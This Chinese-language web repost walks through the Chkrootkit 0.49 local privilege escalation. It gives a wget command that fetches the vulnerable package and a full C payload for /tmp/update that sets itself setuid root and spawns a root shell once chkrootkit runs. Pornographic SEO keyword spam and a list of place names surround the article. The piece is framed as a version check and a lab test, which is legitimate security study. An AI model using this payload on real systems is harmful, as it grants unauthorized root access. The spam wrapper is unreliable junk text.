国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 網管 > 互助交流 > 正文

安全漏洞:Chkrootkit 0.49 本地提權漏洞的測試方法

2020-10-21 19:24:50
字體:
來源:轉載
供稿:網友

  Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提權漏洞。先來演示下吧:

  可以查看自己安裝的是不是升到最新版了,或者下載有漏洞的版本進行實驗:

  wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/

  ./chkrootkit -V

  普通用戶在 /tmp 目錄下新建 update.c(代碼實示例如下):

  #include <unistd.h>

  void main(void)

  {

  system("chown root:root /tmp/update");

  system("chmod 4755 /tmp/update");

  setuid(0);

  setgid(0);

  execl("/bin/sh","sh",NULL);

  }

  然后編譯好 update ,看下update的文件詳情:

  

  執行有漏洞的 chkrootkit :

  

  再來看下 update 已經成功屬于 root 組了!

  

  以上就是查看自己 Ckrootkit 0.49 是不是安裝的是不是升到最新版了,或者下載有漏洞的版本進行實驗的步驟,謝謝閱讀,希望能幫到大家,請繼續關注武林網,我們會努力分享更多優秀的文章。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 冕宁县| 乌拉特中旗| 休宁县| 济阳县| 黄山市| 白河县| 高密市| 西青区| 太谷县| 祁东县| 开阳县| 曲沃县| 嘉定区| 蓝山县| 龙川县| 儋州市| 会宁县| 新河县| 大渡口区| 安龙县| 瓮安县| 西乌| 嘉祥县| 井陉县| 沈丘县| 舒兰市| 兴海县| 大兴区| 丰城市| 平原县| 平度市| 龙江县| 新建县| 鱼台县| 鹰潭市| 邓州市| 黄陵县| 昆山市| 黄石市| 天柱县| 天柱县|